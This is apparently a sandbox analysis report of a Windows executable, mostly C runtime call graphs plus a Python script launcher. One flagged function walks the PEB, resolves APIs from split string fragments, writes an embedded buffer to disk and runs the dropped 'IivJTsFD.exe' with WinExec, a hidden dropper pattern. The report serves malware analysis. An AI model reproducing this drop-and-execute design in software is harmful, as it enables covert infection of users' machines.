8834 40cc56 8832->8834 8839 4039d1 __calloc_crt 67 API calls 8833->8839 8875 40d673 8834->8875 8836 40cc5f 8838 40cc77 8836->8838 8893 40cad7 8836->8893 8837 40cbc9 _strlen 8840 4039d1 __calloc_crt 67 API calls 8837->8840 8837->8857 8838->8843 8845 403abd __freea 67 API calls 8838->8845 8842 40cc97 8839->8842 8844 40cbe4 8840->8844 8842->8843 8846 408f6b _strcpy_s 67 API calls 8842->8846 8843->8238 8844->8843 8847 408f6b _strcpy_s 67 API calls 8844->8847 8845->8843 8848 40ccb3 8846->8848 8849 40cc00 8847->8849 8850 40ccc4 _strlen 8848->8850 8852 4035c0 __invoke_watson 10 API calls 8848->8852 8851 40cc11 8849->8851 8853 4035c0 __invoke_watson 10 API calls 8849->8853 8856 403750 __read 67 API calls 8850->8856 8854 408df6 _strcat_s 67 API calls 8851->8854 8852->8850 8853->8851 8855 40cc1e 8854->8855 8855->8857 8858 4035c0 __invoke_watson 10 API calls 8855->8858 8862 40ccda 8856->8862 8857->8830 8858->8857 8859 408f6b _strcpy_s 67 API calls 8859->8862 8860 40d673 __waccess_s 69 API calls 8860->8862 8861 4035c0 __invoke_watson 10 API calls 8861->8862 8862->8859 8862->8860 8862->8861 8863 40cd2b 8862->8863 8864 40cd29 8862->8864 8865 403750 __read 67 API calls 8863->8865 8868 403abd __freea 67 API calls 8864->8868 8866 40cd30 8865->8866 8867 40cad7 _wcomexecmd 136 API calls 8866->8867 8867->8864 8868->8838 8908 40d6fc 8869->8908 8871 40cba4 8871->8828 8915 40ba4a 8872->8915 8874 40bb18 8874->8837 8876 40d680 8875->8876 8877 40d6a4 8875->8877 8879 403763 __read 67 API calls 8876->8879 8877->8876 8878 40d6ad GetFileAttributesA 8877->8878 8880 40d6d1 8878->8880 8881 40d6bb GetLastError 8878->8881 8882 40d685 8879->8882 8889 403763 __read 67 API calls 8880->8889 8890 40d69c 8880->8890 8883 403776 __dosmaperr 67 API calls 8881->8883 8884 403750 __read 67 API calls 8882->8884 8886 40d6c7 8883->8886 8885 40d68c 8884->8885 8887 4036e8 __read 6 API calls 8885->8887 8888 403750 __read 67 API calls 8886->8888 8887->8890 8888->8890 8891 40d6e4 8889->8891 8890->8836 8892 403750 __read 67 API calls 8891->8892 8892->8886 8894 40cb03 8893->8894 8895 40cae6 8893->8895 8894->8895 8896 40cb08 8894->8896 8897 403750 __read 67 API calls 8895->8897 8922 40d29a 8896->8922 8899 40caeb 8897->8899 8900 4036e8 __read 6 API calls 8899->8900 8902 40cafb 8900->8902 8902->8838 8905 403abd __freea 67 API calls 8906 40cb40 8905->8906 8907 403abd __freea 67 API calls 8906->8907 8907->8902 8909 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8908->8909 8910 40d715 8909->8910 8911 403750 __read 67 API calls 8910->8911 8914 40d731 _strrchr 8910->8914 8912 40d721 8911->8912 8913 4036e8 __read 6 API calls 8912->8913 8913->8914 8914->8871 8916 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8915->8916 8917 40ba5e 8916->8917 8918 403750 __read 67 API calls 8917->8918 8921 40ba7c __mbschr_l 8917->8921 8919 40ba6c 8918->8919 8920 4036e8 __read 6 API calls 8919->8920 8920->8921 8921->8874 8923 40d2e8 _strlen 8922->8923 8924 4039d1 __calloc_crt 67 API calls 8923->8924 8925 40d307 8924->8925 8926 40d312 8925->8926 8927 40d335 8925->8927 8928 403750 __read 67 API calls 8926->8928 9009 40adff 8927->9009 8930 40d31c 8928->8930 8932 403763 __read 67 API calls 8930->8932 8931 40d343 8933 40d34a 8931->8933 8942 40d35e _strlen 8931->8942 8941 40d327 8932->8941 8934 4035c0 __invoke_watson 10 API calls 8933->8934 8949 40d359 8933->8949 8934->8949 8935 403abd __freea 67 API calls 8979 40d3cb 8935->8979 8936 401ee2 setSBUpLow 5 API calls 8937 40cb1e 8936->8937 8937->8902 8980 40d08b 8937->8980 8938 40d3d8 8943 408f6b _strcpy_s 67 API calls 8938->8943 8953 40d3ec _strlen 8938->8953 8941->8936 8942->8938 8945 4063a0 ___crtGetEnvironmentStringsA 76 API calls 8942->8945 8963 40d3f2 _strlen 8942->8963 8946 40d4ec 8943->8946 8947 40d3b4 8945->8947 8950 4035c0 __invoke_watson 10 API calls 8946->8950 8946->8953 8947->8949 8947->8963 8948 408f6b _strcpy_s 67 API calls 8948->8953 8949->8935 8950->8953 8951 4035c0 __invoke_watson 10 API calls 8951->8953 8952 40d48e 8955 4039d1 __calloc_crt 67 API calls 8952->8955 8953->8948 8953->8951 8958 40d54d ___crtGetEnvironmentStringsA _strlen 8953->8958 8958->8979 8963->8952 9033 40d997 8963->9033 8982 40d0a4 8980->8982 8987 40d0b5 _memset 8980->8987 8981 40d0c1 8983 403763 __read 67 API calls 8981->8983 8982->8981 8982->8987 8984 40d0c6 8983->8984 8985 403750 __read 67 API calls 8984->8985 8986 40d0cd 8985->8986 8990 4036e8 __read 6 API calls 8986->8990 8988 40d287 8987->8988 8989 4039d1 __calloc_crt 67 API calls 8987->8989 8991 403750 __read 67 API calls 8988->8991 8992 40d16a 8989->8992 8993 40cb36 8990->8993 8991->8993 8992->8988 8995 40d177 8992->8995 8993->8905 8994 403763 __read 67 API calls 8996 40d1f9 CreateProcessA GetLastError 8994->8996 8995->8994 8997 403abd __freea 67 API calls 8996->8997 8998 40d22c 8997->8998 8999 40d231 8998->8999 9001 40d23a 8998->9001 9000 403776 __dosmaperr 67 API calls 8999->9000 9000->8993 9002 40d246 9001->9002 9159 4023ea 9001->9159 9004 40d251 WaitForSingleObject GetExitCodeProcess 9002->9004 9005 40d26e 9002->9005 9006 40d274 CloseHandle 9004->9006 9005->9006 9007 40d27b 9005->9007 9010 40ae0b ___lock_fhandle 9009->9010 9011 403ef9 __lock 67 API calls 9010->9011 9012 40ae12 9011->9012 9013 40ae26 9012->9013 9016 40ae5c 9012->9016 9014 403750 __read 67 API calls 9013->9014 9015 40ae2b 9014->9015 9017 4036e8 __read 6 API calls 9015->9017 9036 40ad78 9016->9036 9031 40ae3a 9017->9031 9020 40aed3 ___lock_fhandle 9020->8931 9021 40ae64 _strlen 9022 401a9b _calloc 67 API calls 9021->9022 9021->9031 9023 40ae7d 9022->9023 9024 40ae86 9023->9024 9025 40ae9d 9023->9025 9026 403750 __read 67 API calls 9024->9026 9027 408f6b _strcpy_s 67 API calls 9025->9027 9028 40ae8b 9026->9028 9029 40aea7 9027->9029 9030 403750 __read 67 API calls 9028->9030 9029->9031 9032 4035c0 __invoke_watson 10 API calls 9029->9032 9030->9031 9042 40aedc 9031->9042 9032->9031 9123 40d7cf 9033->9123 9037 40ad91 9036->9037 9038 40ad8d 9036->9038 9037->9038 9040 40ada3 _strlen 9037->9040 9045 40b169 9037->9045 9038->9021 9040->9038 9055 40b14f 9040->9055 9122 403e1f LeaveCriticalSection 9042->9122 9044 40aee3 9044->9020 9047 40b1e9 9045->9047 9053 40b184 9045->9053 9046 40b18a WideCharToMultiByte 9046->9047 9046->9053 9047->9040 9048 4039d1 __calloc_crt 67 API calls 9048->9053 9049 40b1ad WideCharToMultiByte 9050 40b1f5 9049->9050 9049->9053 9051 403abd __freea 67 API calls 9050->9051 9051->9047 9053->9046 9053->9047 9053->9048 9053->9049 9054 403abd __freea 67 API calls 9053->9054 9058 40b7aa 9053->9058 9054->9053 9104 40b061 9055->9104 9059 40b7dc 9058->9059 9060 40b7bf 9058->9060 9062 40b83a 9059->9062 9065 40bb06 ___crtsetenv 77 API calls 9059->9065 9061 403750 __read 67 API calls 9060->9061 9063 40b7c4 9061->9063 9064 403750 __read 67 API calls 9062->9064 9066 4036e8 __read 6 API calls 9063->9066 9093 40b7d4 9064->9093 9068 40b7ef 9065->9068 9066->9093 9067 40b81b 9070 40b878 9067->9070 9071 40b84d 9067->9071 9072 40b831 9067->9072 9068->9062 9068->9067 9069 40b750 _copy_environ 67 API calls 9068->9069 9069->9067 9073 40b6fe ___crtsetenv 111 API calls 9070->9073 9070->9093 9076 40398c __malloc_crt 67 API calls 9071->9076 9071->9093 9074 40b169 ___wtomb_environ 120 API calls 9072->9074 9075 40b89c 9073->9075 9077 40b836 9074->9077 9078 40b8f5 9075->9078 9081 40b8a7 9075->9081 9079 40b85d 9076->9079 9077->9062 9077->9070 9079->9070 9084 40398c __malloc_crt 67 API calls 9079->9084 9079->9093 9084->9070 9093->9053 9105 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 9104->9105 9106 40b075 9105->9106 9107 40b096 9106->9107 9108 40b0c9 9106->9108 9118 40b07e 9106->9118 9109 403750 __read 67 API calls 9107->9109 9111 40b0d3 9108->9111 9112 40b0ed 9108->9112 9110 40b09b 9109->9110 9113 4036e8 __read 6 API calls 9110->9113 9114 403750 __read 67 API calls 9111->9114 9115 40b0f5 9112->9115 9116 40b109 9112->9116 9113->9118 9119 40b0d8 9114->9119 9120 40b604 __strnicoll_l 111 API calls 9115->9120 9117 40b5c2 ___crtCompareStringA 100 API calls 9116->9117 9117->9118 9118->9040 9121 4036e8 __read 6 API calls 9119->9121 9120->9118 9121->9118 9122->9044 9124 40d7e6 9123->9124 9133 40d7df 9123->9133 9133->8963 9162 4022a8 9159->9162 9163 4022b4 ___lock_fhandle 9162->9163 9188 402024 9187->9188 9189 402007 9187->9189 9188->9189 9190 40202b 9188->9190 9191 403750 __read 67 API calls 9189->9191 9192 402793 __output_l 103 API calls 9190->9192 9193 40200c 9191->9193 9194 402051 9192->9194 9195 4036e8 __read 6 API calls 9193->9195 9196 40201c 9194->9196 9198 4054fc 9194->9198 9195->9196 9196->8247 9199 40357f __fileno 67 API calls 9198->9199 9200 40550c 9199->9200 9201 405517 9200->9201 9202 40552e 9200->9202 9203 403750 __read 67 API calls 9201->9203 9204 405532 9202->9204 9207 40553f __stbuf 9202->9207 9206 40551c 9203->9206 9205 403750 __read 67 API calls 9204->9205 9205->9206 9206->9196 9207->9206 9214 40659d __stbuf 67 API calls 9207->9214 9215 405595 9207->9215 9218 4055a0 9207->9218 9208 40562f 9210 40810c __locking 101 API calls 9208->9210 9209 4055af 9211 4055e3 9209->9211 9212 4055c6 9209->9212 9210->9206 9211->9206 9222 4094a5 9211->9222 9213 40810c __locking 101 API calls 9212->9213 9213->9206 9214->9215 9215->9218 9219 4095be 9215->9219 9218->9208 9218->9209 9220 40398c __malloc_crt 67 API calls 9219->9220 9221 4095d3 9220->9221 9221->9218 9223 4094b1 ___lock_fhandle 9222->9223 9224 4094c2 9223->9224 9225 4094de 9223->9225 9226 403763 __read 67 API calls 9224->9226 9227 4094ec 9225->9227 9229 40950d 9225->9229 9228 4094c7 9226->9228 9230 403763 __read 67 API calls 9227->9230 9234 403750 __read 67 API calls 9228->9234 9232 409553 9229->9232 9233 40952d 9229->9233 9231 4094f1 9230->9231 9235 403750 __read 67 API calls 9231->9235 9237 40a5c9 ___lock_fhandle 68 API calls 9232->9237 9236 403763 __read 67 API calls 9233->9236 9245 4094cf ___lock_fhandle 9234->9245 9238 4094f8 9235->9238 9239 409532 9236->9239 9240 409559 9237->9240 9243 4036e8 __read 6 API calls 9238->9243 9244 403750 __read 67 API calls 9239->9244 9241 409582 9240->9241 9242 409566 9240->9242 9247 403750 __read 67 API calls 9241->9247 9246 409420 __lseeki64_nolock 69 API calls 9242->9246 9243->9245 9248 409539 9244->9248 9245->9206 9249 409577 9246->9249 9250 409587 9247->9250 9251 4036e8 __read 6 API calls 9248->9251 9254 4095b4 9249->9254 9252 403763 __read 67 API calls 9250->9252 9251->9245 9252->9249 9257 40a669 LeaveCriticalSection 9254->9257 9256 4095bc 9256->9245 9257->9256 9366 405188 9367 405194 ___lock_fhandle 9366->9367 9368 405296 ___lock_fhandle 9367->9368 9369 403abd __freea 67 API calls 9367->9369 9370 4051ac 9367->9370 9369->9370 9371 4051ba 9370->9371 9372 403abd __freea 67 API calls 9370->9372 9373 4051c8 9371->9373 9375 403abd __freea 67 API calls 9371->9375 9372->9371 9374 4051d6 9373->9374 9376 403abd __freea 67 API calls 9373->9376 9377 4051e4 9374->9377 9378 403abd __freea 67 API calls 9374->9378 9375->9373 9376->9374 9379 4051f2 9377->9379 9380 403abd __freea 67 API calls 9377->9380 9378->9377 9381 405200 9379->9381 9383 403abd __freea 67 API calls 9379->9383 9380->9379 9382 405211 9381->9382 9384 403abd __freea 67 API calls 9381->9384 9385 403ef9 __lock 67 API calls 9382->9385 9383->9381 9384->9382 9386 405219 9385->9386 9387 405225 InterlockedDecrement 9386->9387 9388 40523e 9386->9388 9387->9388 9389 405230 9387->9389 9402 4052a2 9388->9402 9389->9388 9392 403abd __freea 67 API calls 9389->9392 9392->9388 9393 403ef9 __lock 67 API calls 9394 405252 9393->9394 9395 405283 9394->9395 9396 404d5a ___removelocaleref 8 API calls 9394->9396 9405 4052ae 9395->9405 9400 405267 9396->9400 9399 403abd __freea 67 API calls 9399->9368 9400->9395 9401 404b82 ___freetlocinfo 67 API calls 9400->9401 9401->9395 9408 403e1f LeaveCriticalSection 9402->9408 9404 40524b 9404->9393 9409 403e1f LeaveCriticalSection 9405->9409 9407 405290 9407->9399 9408->9404 9409->9407 9418 40199d 9425 403d74 9418->9425 9421 4019b0 9423 403abd __freea 67 API calls 9421->9423 9424 4019bb 9423->9424 9438 403c9a 9425->9438 9427 4019a2 9427->9421 9428 403b4b 9427->9428 9429 403b57 ___lock_fhandle 9428->9429 9430 403ef9 __lock 67 API calls 9429->9430 9437 403b63 9430->9437 9431 403bcc 9479 403be1 9431->9479 9433 403bd8 ___lock_fhandle 9433->9421 9435 403ba1 DeleteCriticalSection 9436 403abd __freea 67 API calls 9435->9436 9436->9437 9437->9431 9437->9435 9466 40795d 9437->9466 9439 403ca6 ___lock_fhandle 9438->9439 9440 403ef9 __lock 67 API calls 9439->9440 9447 403cb5 9440->9447 9441 403d4d 9456 403d6b 9441->9456 9444 403d59 ___lock_fhandle 9444->9427 9446 403c52 105 API calls __fflush_nolock 9446->9447 9447->9441 9447->9446 9448 4019fe 9447->9448 9453 403d3c 9447->9453 9449 401a21 EnterCriticalSection 9448->9449 9450 401a0b 9448->9450 9449->9447 9451 403ef9 __lock 67 API calls 9450->9451 9452 401a14 9451->9452 9452->9447 9459 401a6c 9453->9459 9455 403d4a 9455->9447 9465 403e1f LeaveCriticalSection 9456->9465 9458 403d72 9458->9444 9460 401a7c 9459->9460 9461 401a8f LeaveCriticalSection 9459->9461 9464 403e1f LeaveCriticalSection 9460->9464 9461->9455 9463 401a8c 9463->9455 9464->9463 9465->9458 9467 407969 ___lock_fhandle 9466->9467 9468 40799a 9467->9468 9469 40797d 9467->9469 9472 4019bd __lock_file 68 API calls 9468->9472 9477 407992 ___lock_fhandle 9468->9477 9470 403750 __read 67 API calls 9469->9470 9471 407982 9470->9471 9474 4036e8 __read 6 API calls 9471->9474 9473 4079b2 9472->9473 9482 4078e6 9473->9482 9474->9477 9477->9437 9505 403e1f LeaveCriticalSection 9479->9505 9481 403be8 9481->9433 9483 407916 9482->9483 9484 4078fa 9482->9484 9487 403bea __flush 101 API calls 9483->9487 9490 40790f 9483->9490 9485 403750 __read 67 API calls 9484->9485 9486 4078ff 9485->9486 9488 4036e8 __read 6 API calls 9486->9488 9489 407922 9487->9489 9488->9490 9501 40a1ee 9489->9501 9498 4079d1 9490->9498 9493 40357f __fileno 67 API calls 9494 407930 9493->9494 9495 40a121 __close 72 API calls 9494->9495 9496 407936 9495->9496 9496->9490 9497 403abd __freea 67 API calls 9496->9497 9497->9490 9499 401a30 _fprintf 2 API calls 9498->9499 9500 4079d7 9499->9500 9500->9477 9502 40792a 9501->9502 9503 40a1fe 9501->9503 9502->9493 9503->9502 9504 403abd __freea 67 API calls 9503->9504 9504->9502 9505->9481

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 414044-414074 GetPEB 1 414077-41409a 0->1 2 41409d-4140a0 1->2 3 4140a6-4140bc 2->3 4 4141ee-41422b CreateFileA 2->4 5 414110-414116 3->5 6 4140be-4140c5 3->6 21 414265-414269 4->21 22 41422d-414230 4->22 8 414129-41412f 5->8 9 414118-41411f 5->9 6->5 10 4140c7-4140ce 6->10 12 414131-414138 8->12 13 414148-41414e 8->13 9->8 11 414121-414124 9->11 10->5 14 4140d0-4140d7 10->14 16 4141bb-4141c0 11->16 12->13 17 41413a-414141 12->17 18 414150-414157 13->18 19 414167-41416f 13->19 14->5 20 4140d9-4140dd 14->20 24 4141e0-4141e9 16->24 25 4141c2-4141c5 16->25 17->13 23 414143-414146 17->23 18->19 26 414159-414160 18->26 27 414171-414178 19->27 28 414188-41418e 19->28 20->5 29 4140df-4140e3 20->29 32 414232-414238 22->32 23->16 24->2 25->24 33 4141c7-4141ca 25->33 26->19 34 414162-414165 26->34 27->28 35 41417a-414181 27->35 30 414190-414197 28->30 31 4141a7-4141ad 28->31 29->16 36 4140e9-41410b 29->36 30->31 37 414199-4141a0 30->37 31->16 38 4141af-4141b6 31->38 39 414246-414252 WriteFile 32->39 40 41423a-414242 32->40 33->24 41 4141cc-4141cf 33->41 34->16 35->28 42 414183-414186 35->42 36->1 37->31 44 4141a2-4141a5 37->44 38->16 45 4141b8 38->45 47 414255-414262 CloseHandle WinExec 39->47 40->32 46 414244 40->46 41->24 48 4141d1-4141d4 41->48 42->16 44->16 45->16 46->47 47->21 48->24 49 4141d6-4141d9 48->49 49->24 50 4141db-4141de 49->50 50->4 50->24
                              APIs
                              • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00414223
                              • WriteFile.KERNELBASE(00000000,FFFEE3A2,00003E00,?,00000000), ref: 00414252
                              • CloseHandle.KERNELBASE(00000000), ref: 00414256
                              • WinExec.KERNEL32(?,00000005), ref: 00414262
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: File$CloseCreateExecHandleWrite
                              • String ID: .dll$Clos$Crea$GetM$GetT$IivJTsFD.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                              • API String ID: 3741012433-1184572760
                              • Opcode ID: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
                              • Instruction ID: 0fad939afa1a3e6eef74dcea6ddb39993472a9db8089d9d8a1791b0fffe143ca
                              • Opcode Fuzzy Hash: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
                              • Instruction Fuzzy Hash: 1C611978D00215ABCF24CF94D848AEEBBB0BB94315F2582ABD505A7741C7789EC1CB99

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp__wincmdln
                              • String ID: `%]
                              • API String ID: 3545360858-1254092700
                              • Opcode ID: 47c8b048b90f4a39332f367b4157c1dffe310d981b80df09f713873d210ea5e8
                              • Instruction ID: 386dad546ae3ee6facd522547f2789e0b0893060b3c0379e512b7a46b385323c
                              • Opcode Fuzzy Hash: 47c8b048b90f4a39332f367b4157c1dffe310d981b80df09f713873d210ea5e8
                              • Instruction Fuzzy Hash: 95215370940314A9EB14BB72AE5EB6F2664AF0074CF10487FF501BA1C2EAFC8A409B5D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 113 4014e0-401515 GetModuleFileNameA 114 401518-40151d 113->114 114->114 115 40151f-40152b 114->115 116 401541-401549 115->116 117 40152d 115->117 119 401550-401556 116->119 118 401530-401533 117->118 118->116 120 401535-40153f 118->120 119->119 121 401558-40157a call 40ca21 119->121 120->116 120->118 123 40157f-401587 121->123 124 401589-4015bc call 4018e6 call 4017ca call 401ee2 123->124 125 4015bd-4015e9 call 40c205 call 40a121 123->125 135 4015f0-4015f3 125->135 137 401605-401621 call 402074 135->137 138 4015f5-4015f9 135->138 143 401623-40164f 137->143 144 401656-401684 call 4011f0 call 4010a0 137->144 138->137 139 4015fb-4015fe 138->139 139->137 141 401600-401603 139->141 141->135 141->137 143->144 149 401691-4016c9 call 401a9b call 401000 144->149 150 401686-40168c 144->150 159 4016ea-401703 call 401000 149->159 160 4016cb 149->160 151 401749-401775 call 4018e6 call 4017ca call 401ee2 150->151 168 401705-40171d call 401000 159->168 169 40171f-40172f 159->169 163 4016d0-4016e8 call 401000 160->163 163->159 168->169 172 401731-401744 call 40bbf4 169->172 173 401776-4017a9 call 401410 call 401350 call 401ee2 169->173 172->151
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: _fprintf$FileModuleName__close__execv__open__read_calloc_strncmp
                              • String ID: #!python.exe$-script.pyw$Cannot find Python executable %s$Cannot open %s$Could not exec %s
                              • API String ID: 2502740745-3972628896
                              • Opcode ID: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
                              • Instruction ID: 796e4f919e2f8e9c448ad3e98618f95884ab6d66caa4008a2a0434ec9930ee7c
                              • Opcode Fuzzy Hash: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
                              • Instruction Fuzzy Hash: A07136719043419BD320EF65D885B9B73E8AFD8304F14493EF489A73E1E639E9448B9B

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 183 4021b8-4021c9 call 40218d ExitProcess
                              APIs
                              • ___crtCorExitProcess.LIBCMT ref: 004021C0
                                • Part of subcall function 0040218D: GetModuleHandleW.KERNEL32(mscoree.dll,?,004021C5,?,?,00406AFB,000000FF,0000001E,?,0040399D,?,00000001,?,?,00403E83,00000018), ref: 00402197
                                • Part of subcall function 0040218D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004021A7
                              • ExitProcess.KERNEL32 ref: 004021C9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                              • String ID:
                              • API String ID: 2427264223-0
                              • Opcode ID: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
                              • Instruction ID: 4f065410a833747b2fa51117dbabb5f5d23e2195355c7fa658f3e8009557e2db
                              • Opcode Fuzzy Hash: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
                              • Instruction Fuzzy Hash: F4B09B31000158BBDB012F23DD4DC4D7F55DB403917104035F914190B1DFB1AD5299D4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 186 4064d7-4064f9 HeapCreate 187 4064fb-4064fc 186->187 188 4064fd-406506 186->188
                              APIs
                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004064EC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
                              • Instruction ID: fc63dde57cecbdf2c2aaf7bb1ec022fcb12f636a59951f49be284e9b9c4476cd
                              • Opcode Fuzzy Hash: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
                              • Instruction Fuzzy Hash: A9D05E72A903455AEB145F75BE08B623BDCD784795F00843AB80DC6190E5B4D5609948

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 189 4023d4-4023e0 call 4022a8 191 4023e5-4023e9 189->191
                              APIs
                              • _doexit.LIBCMT ref: 004023E0
                                • Part of subcall function 004022A8: __lock.LIBCMT ref: 004022B6
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 004022ED
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402302
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040232C
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402342
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040234F
                                • Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040237E
                                • Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040238E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: __decode_pointer$__initterm$__lock_doexit
                              • String ID:
                              • API String ID: 1597249276-0
                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction ID: 56d6ec75f9ca001e469de65b509690461a690c23f8048b21a9ddfe31d5bb7ce0
                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction Fuzzy Hash: D5B0927258020833EA202582AC07F063B1987C0B64E240066BA0C295E1A9A6A961808A
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 00404454
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404469
                              • UnhandledExceptionFilter.KERNEL32(0040E2D4), ref: 00404474
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00404490
                              • TerminateProcess.KERNEL32(00000000), ref: 00404497
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
